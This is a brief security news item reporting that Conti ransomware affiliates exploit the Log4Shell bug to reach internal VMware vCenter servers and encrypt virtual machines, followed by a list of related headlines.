Security News > 2021 > December > Conti ransomware uses Log4j bug to hack VMware vCenter servers
Conti ransomware operation is using the critical Log4Shell exploit to gain rapid access to internal VMware vCenter Server instances and encrypt virtual machines.
Among the first to leverage the bug were cryptocurrency miners, botnets, and a new ransomware strain called Khonsari.
While most defenders are focused on blocking Log4Shell attacks on Internet-exposed devices, the Conti ransomware operation shows how the vulnerability can be used to target internal devices that may not receive as much attention.
The researchers confirmed that Conti ransomware affiliates had already compromised the target networks and exploited vulnerable Log4j machines to gain access to vCenter servers.
Conti is a Russian-speaking group that has been in the ransomware game for a long time, being the successor of the infamous Ryuk.
Recently, the Australian Cyber Security Centre published an alert about Conti ransomware targeting multiple organizations in the country.
News URL
Related news
- Over 37,000 VMware ESXi servers vulnerable to ongoing attacks (source)
- Like whitebox servers, rent-a-crew crime 'affiliates' have commoditized ransomware (source)
- ⚡ THN Weekly Recap: Router Hacks, PyPI Attacks, New Ransomware Decryptor, and More (source)
- Veeam RCE bug lets domain users hack backup servers, patch now (source)
- RedCurl cyberspies create ransomware to encrypt Hyper-V servers (source)